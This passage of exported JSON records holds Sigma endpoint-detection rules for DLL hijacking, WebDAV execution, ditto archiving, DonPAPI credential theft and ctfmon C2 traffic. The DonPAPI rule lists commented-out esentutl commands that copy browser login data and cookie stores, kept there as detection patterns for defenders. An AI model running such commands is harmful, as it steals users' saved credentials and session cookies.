"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091445Z",
"creation_date": "2026-03-23T11:45:34.091447Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091452Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_fltmc.yml",
"content": "title: DLL Hijacking via fltmc.exe\nid: 2cacb51e-86d2-4851-9e44-b3544e02427f\ndescription: |\n Detects potential Windows DLL Hijacking via fltmc.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers have used this technique by copying a legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'fltmc.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\FLTLIB.DLL'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2cacb51e-86d2-4851-9e44-b3544e02427f",
"rule_name": "DLL Hijacking via fltmc.exe",
"rule_description": "Detects potential Windows DLL Hijacking via fltmc.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying a legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2ccca8c6-4fec-4f8e-a3eb-c4693b526b28",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074206Z",
"creation_date": "2026-03-23T11:45:34.074208Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074212Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://cert.gov.ua/article/6276894",
"https://attack.mitre.org/techniques/T1021/002/"
],
"name": "t1021_002_execution_from_webdav.yml",
"content": "title: Suspicious Execution from WebDAV Share\nid: 2ccca8c6-4fec-4f8e-a3eb-c4693b526b28\ndescription: |\n Detects the execution of a process from a WebDAV share.\n WebDAV is an unusual location for binaries to be executed from.\n Attackers can use remote WebDAV shares to execute malicious binaries from without having to put them on the infected system.\n It is recommended to analyze the executed binary and look for malicious content or behavior.\nreferences:\n - https://cert.gov.ua/article/6276894\n - https://attack.mitre.org/techniques/T1021/002/\ndate: 2024/01/26\nmodified: 2025/03/06\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image:\n - '\\\\\\\\*@80\\\\*'\n - '\\\\\\\\*@443\\\\*'\n - '\\\\\\\\*@SSL\\\\*'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2ccca8c6-4fec-4f8e-a3eb-c4693b526b28",
"rule_name": "Suspicious Execution from WebDAV Share",
"rule_description": "Detects the execution of a process from a WebDAV share.\nWebDAV is an unusual location for binaries to be executed from.\nAttackers can use remote WebDAV shares to execute malicious binaries from without having to put them on the infected system.\nIt is recommended to analyze the executed binary and look for malicious content or behavior.\n",
"rule_creation_date": "2024-01-26",
"rule_modified_date": "2025-03-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2cdfd8e4-0fb6-42ec-83a6-010700352f20",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.600335Z",
"creation_date": "2026-03-23T11:45:34.600339Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.600346Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://wietze.github.io/blog/save-the-environment-variables",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_set.yml",
"content": "title: DLL Hijacking via set.exe\nid: 2cdfd8e4-0fb6-42ec-83a6-010700352f20\ndescription: |\n Detects potential Windows DLL Hijacking via set.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'setx.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\sspicli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2cdfd8e4-0fb6-42ec-83a6-010700352f20",
"rule_name": "DLL Hijacking via set.exe",
"rule_description": "Detects potential Windows DLL Hijacking via set.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2d0520f1-59a9-4523-8001-7336ef5c28cc",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618443Z",
"creation_date": "2026-03-23T11:45:34.618445Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618449Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1560/001/"
],
"name": "t1560_001_ditto_archive_creation.yml",
"content": "title: Archive Created via ditto\nid: 2d0520f1-59a9-4523-8001-7336ef5c28cc\ndescription: |\n Detects a suspicious archive creation using the ditto MacOS utility.\n Adversaries may compress and/or encrypt collected data using ditto prior to exfiltration.\n It is recommended to check the processes leading to ditto's execution, the content of the archive, and any other alerts that may have been raised around this event.\nreferences:\n - https://attack.mitre.org/techniques/T1560/001/\ndate: 2024/06/13\nmodified: 2025/03/27\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1560.001\n - attack.t1119\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Tool.Ditto\n - classification.macOS.Behavior.Collection\n - classification.macOS.Behavior.Exfiltration\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection:\n Image|endswith: '/ditto'\n CommandLine|contains|all:\n - ' -c'\n - ' --sequesterRsrc'\n - ' --keepParent'\n\n exclusion_airwatch:\n ProcessParentImage: '/Library/Application Support/AirWatch/hublogd'\n\n exclusion_outlook:\n ProcessParentImage: '/Applications/Microsoft Outlook.app/Contents/MacOS/Microsoft Outlook'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2d0520f1-59a9-4523-8001-7336ef5c28cc",
"rule_name": "Archive Created via ditto",
"rule_description": "Detects a suspicious archive creation using the ditto MacOS utility.\nAdversaries may compress and/or encrypt collected data using ditto prior to exfiltration.\nIt is recommended to check the processes leading to ditto's execution, the content of the archive, and any other alerts that may have been raised around this event.\n",
"rule_creation_date": "2024-06-13",
"rule_modified_date": "2025-03-27",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection"
],
"rule_technique_tags": [
"attack.t1119",
"attack.t1560.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2d125387-a98b-4b47-843e-3e6a3fb7b5eb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087464Z",
"creation_date": "2026-03-23T11:45:34.087466Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087470Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/login-securite/DonPAPI/",
"https://attack.mitre.org/techniques/T1047/",
"https://attack.mitre.org/techniques/T1555/003/"
],
"name": "t1555_003_donpapi_browser_credentials.yml",
"content": "title: Browser Credentials Gathered via DonPAPI\nid: 2d125387-a98b-4b47-843e-3e6a3fb7b5eb\ndescription: |\n Detects browser credential gathering via a legacy version of the DonPAPI tool.\n DonPAPI is a Python tool specialized in gathering DPAPI (Data Protection Application Programming Interface) protected credentials.\n DPAPI is a method to encrypt and decrypt sensitive data such as credentials using the CryptProtectData and CryptUnprotectData functions used in particular used by browsers.\n It is recommended to investigate actions made by the child process and identify the source of the remote connection using authentication logs.\nreferences:\n - https://github.com/login-securite/DonPAPI/\n - https://attack.mitre.org/techniques/T1047/\n - https://attack.mitre.org/techniques/T1555/003/\ndate: 2024/03/05\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1047\n - attack.credential_access\n - attack.t1555.003\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.SensitiveInformation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n # CommandLine:\n # - 'cmd.exe /Q /c del ?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data.tmp'\n # - 'cmd.exe /Q /c del ?:\\Users\\\\*\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.tmp'\n # - 'cmd.exe /Q /c del ?:\\Users\\\\*\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Safe Browsing Network\\Safe Browsing Cookies.tmp'\n # - 'cmd.exe /Q /c del ?:\\Users\\\\*\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\\\*\\\\*.tmp'\n # - 'cmd.exe /Q /c esentutl.exe /y ?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data /d ?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data.tmp'\n # - 'cmd.exe /Q /c esentutl.exe /y ?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Edge\\User 
Data\\Default\\Network\\Cookies /d ?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Network\\Cookies.tmp'\n # - 'cmd.exe /Q /c esentutl.exe /y ?:\\Users\\\\*\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data /d ?:\\Users\\\\*\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.tmp'\n # - 'cmd.exe /Q /c esentutl.exe /y ?:\\Users\\\\*\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Safe Browsing Network\\Safe Browsing Cookies /d ?:\\Users\\\\*\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Safe Browsing Network\\Safe Browsing Cookies.tmp'\n # - 'cmd.exe /Q /c esentutl.exe /y ?:\\Users\\\\*\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network\\Cookies /d ?:\\Users\\\\*\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network\\Cookies.tmp'\n # - 'cmd.exe /Q /c esentutl.exe /y ?:\\Users\\\\*\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\\\*\\\\* /d ?:\\Users\\\\*\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\\\*\\\\*.tmp'\n ProcessParentName: wmiprvse.exe\n ProcessName: 'cmd.exe'\n CommandLine|re: '.*cmd.exe /Q /c esentutl.exe /y ([^/]*(/d )?){2}.tmp'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2d125387-a98b-4b47-843e-3e6a3fb7b5eb",
"rule_name": "Browser Credentials Gathered via DonPAPI",
"rule_description": "Detects browser credential gathering via a legacy version of the DonPAPI tool.\nDonPAPI is a Python tool specialized in gathering DPAPI (Data Protection Application Programming Interface) protected credentials.\nDPAPI is a method to encrypt and decrypt sensitive data such as credentials using the CryptProtectData and CryptUnprotectData functions, used in particular by browsers.\nIt is recommended to investigate actions made by the child process and identify the source of the remote connection using authentication logs.\n",
"rule_creation_date": "2024-03-05",
"rule_modified_date": "2025-01-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1047",
"attack.t1555.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2d20cb47-e527-4738-b5ba-ab12cd7da516",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.096927Z",
"creation_date": "2026-03-23T11:45:34.096929Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.096934Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_fxsunatd.yml",
"content": "title: DLL Hijacking via fxsunatd.exe\nid: 2d20cb47-e527-4738-b5ba-ab12cd7da516\ndescription: |\n Detects potential Windows DLL Hijacking via fxsunatd.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers have used this technique by copying a legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'fxsunatd.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\FXSAPI.dll'\n - '\\IPHLPAPI.DLL'\n - '\\PROPSYS.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2d20cb47-e527-4738-b5ba-ab12cd7da516",
"rule_name": "DLL Hijacking via fxsunatd.exe",
"rule_description": "Detects potential Windows DLL Hijacking via fxsunatd.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying a legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2d438226-15c9-4f1f-9818-560efb9ac7de",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.605179Z",
"creation_date": "2026-03-23T11:45:34.605182Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.605189Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/ThePorgs/Exegol/",
"https://exegol.readthedocs.io/",
"https://attack.mitre.org/techniques/T1018/"
],
"name": "t1018_silent_workstation_name_exegol.yml",
"content": "title: Activity linked to Workstation Named Exegol\nid: 2d438226-15c9-4f1f-9818-560efb9ac7de\ndescription: |\n Detects an activity from a machine whose name is Exegol, a fully configured Linux-based Docker image for penetration testing and red teaming.\n Attackers may connect external machines to the network to conduct malicious activities.\n It is recommended to check if the machine is expected in the network and for other malicious activity from the machine's IP address.\nreferences:\n - https://github.com/ThePorgs/Exegol/\n - https://exegol.readthedocs.io/\n - https://attack.mitre.org/techniques/T1018/\ndate: 2025/06/04\nmodified: 2025/06/10\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1018\n - classification.Windows.Source.EventLog\n - classification.Windows.HackTool.Exegol\n - classification.Windows.Behavior.NetworkActivity\nlogsource:\n product: windows\n service: security\ndetection:\n selection:\n - Workstation|startswith: 'exegol-'\n - WorkstationName|startswith: 'exegol-'\n\n condition: selection\nlevel: medium\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2d438226-15c9-4f1f-9818-560efb9ac7de",
"rule_name": "Activity linked to Workstation Named Exegol",
"rule_description": "Detects an activity from a machine whose name is Exegol, a fully configured Linux-based Docker image for penetration testing and red teaming.\nAttackers may connect external machines to the network to conduct malicious activities.\nIt is recommended to check if the machine is expected in the network and for other malicious activity from the machine's IP address.\n",
"rule_creation_date": "2025-06-04",
"rule_modified_date": "2025-06-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1018"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2d48e659-e7f3-42cc-ab39-2bb7040a806c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081072Z",
"creation_date": "2026-03-23T11:45:34.081075Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081079Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/Cryptolaemus1/status/1759740446857625639",
"https://twitter.com/reecdeep/status/1759603556288459149",
"https://attack.mitre.org/techniques/T1055/",
"https://attack.mitre.org/techniques/T1571/"
],
"name": "t1055_ctfmon_suspicious_network_communication.yml",
"content": "title: Suspicious ctfmon.exe Network Communication\nid: 2d48e659-e7f3-42cc-ab39-2bb7040a806c\ndescription: |\n Detects network communications via a non-standard port from the legitimate ctfmon.exe Windows binary.\n This can indicate malicious activity, such as communication with a C2 server, after an adversary injects malicious code into a suspended and hollowed process to evade process-based defenses.\n This technique is often used by attackers to establish command-and-control (C2) communication while maintaining persistence and evading detection.\n It has been observed in attacks such as those involving the Pikabot Malware, which used this method to deploy the Medusa Stealer.\n It is recommended to investigate the parent process responsible for initiating this communication, analyze the network traffic details, and examine the destination IP address to determine the legitimacy of the activity.\n Additionally, trying to dump the ctfmon.exe process for analysis can be useful to ensure it is not being abused for malicious purposes.\nreferences:\n - https://twitter.com/Cryptolaemus1/status/1759740446857625639\n - https://twitter.com/reecdeep/status/1759603556288459149\n - https://attack.mitre.org/techniques/T1055/\n - https://attack.mitre.org/techniques/T1571/\ndate: 2024/02/23\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055\n - attack.command_and_control\n - attack.t1571\n - attack.t1071.001\n - classification.Windows.Source.NetworkActivity\n - classification.Windows.Behavior.MemoryExecution\n - classification.Windows.Behavior.ProcessInjection\n - classification.Windows.Behavior.ProcessTampering\n - classification.Windows.Behavior.SacrificialProcess\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: network_connection\n product: windows\ndetection:\n selection:\n ProcessOriginalFileName: 'CTFMON.EXE'\n ProcessParentCommandLine|contains: '?'\n\n filter_parent:\n 
ProcessParentCommandLine:\n - '?:\\WINDOWS\\System32\\svchost.exe -k LocalSystemNetworkRestricted -p -s TabletInputService'\n - '?:\\WINDOWS\\System32\\svchost.exe -k LocalSystemNetworkRestricted -p -s TextInputManagementService'\n\n filter_ip:\n DestinationIp|cidr:\n - '0.0.0.0/8' # RFC 1122, Section 3.2.1.3 \"This\" Network*\n - '10.0.0.0/8' # RFC 1918 Private-Use Networks*\n - '127.0.0.0/8' # RFC 1122, Section 3.2.1.3 Loopback*\n - '169.254.0.0/16' # RFC 3927 Link Local*\n - '172.16.0.0/12' # RFC 1918 Private-Use Networks*\n - '192.0.0.0/24' # RFC 5736 IETF Protocol Assignments*\n - '192.0.2.0/24' # RFC 5737 TEST-NET-1*\n - '192.88.99.0/24' # RFC 3068 6to4 Relay Anycast*\n - '192.168.0.0/16' # RFC 1918 Private-Use Networks*\n - '198.18.0.0/15' # RFC 2544 Network Interconnect Device Benchmark Testing*\n - '198.51.100.0/24' # RFC 5737 TEST-NET-2*\n - '203.0.113.0/24' # RFC 5737 TEST-NET-3*\n - '224.0.0.0/4' # RFC 3171 Multicast*\n - '240.0.0.0/4' # RFC 1112, Section 4 Reserved for Future Use*\n - '255.255.255.255/32' # RFC 919, Section 7 Limited Broadcast*\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
